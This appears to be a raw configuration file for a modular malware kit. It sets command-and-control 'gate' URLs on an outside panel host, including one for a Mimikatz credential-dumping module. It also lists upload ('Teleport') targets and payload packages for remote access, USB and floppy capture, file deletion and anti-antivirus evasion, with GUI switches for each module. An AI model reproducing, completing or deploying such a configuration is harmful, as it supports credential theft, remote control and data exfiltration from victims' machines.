[Settings]
;GateUrl_Adapter=http://dgonideveloper.com/s_panel/gate.php
;GateUrl_Mimikatz=http://dgonideveloper.com/s_panel/gate2.php
TeleportTimeOut=0
TeleportTimer=59
GateUrl_Adapter=*
GateUrl_Mimikatz=*
GateUrl_Teleport1=http://www.tenmax.com/Teleport_Pro_Installer.exe
GateUrl_Teleport2=http://www.tenmax.com/Teleport_Pro_Installer.exe2
GateUrl_Teleport3=http://127.0.0.1/test_post.php
GateUrl_AltTeleport1=http://www.tenmax.com/Teleport_Pro_Installer.exe4
GateUrl_AltTeleport2=http://www.tenmax.com/Teleport_Pro_Installer.exe5
GateUrl_AltTeleport3=http://www.tenmax.com/Teleport_Pro_Installer.exe6

PackID={fc722abb-156d-4553-b597-03be7b667753}

PuntoPackage=pn_pack1.~exe
LitePackage=lmpack1.~exe
MasterPackage=pack1.~exe
AntiNodPackage=and1.~exe
DeleterPackage=rdel1.~exe
TeleportPackage=tlp.~exe
USBPackage=usb1.~exe
FDDPackage=faa1.~exe
NotepadPackage=ntp1.~exe


AmmyPackage=ready_a_m.~exe
MultiPackage=xtm.~exe
ToolbarPackage=tlbr.~exe
MimikatzPackage=mimi.~exe

[GUI]
LMPackage=0
PuntoPackage=0
AmmyPackage=0
MultiPack=0
Deleter=0
Toolbar=0
Mimikatz=0
UsbCatch=0
FddCatch=0
AntiNod=0
Teleport=0
Notepad=1
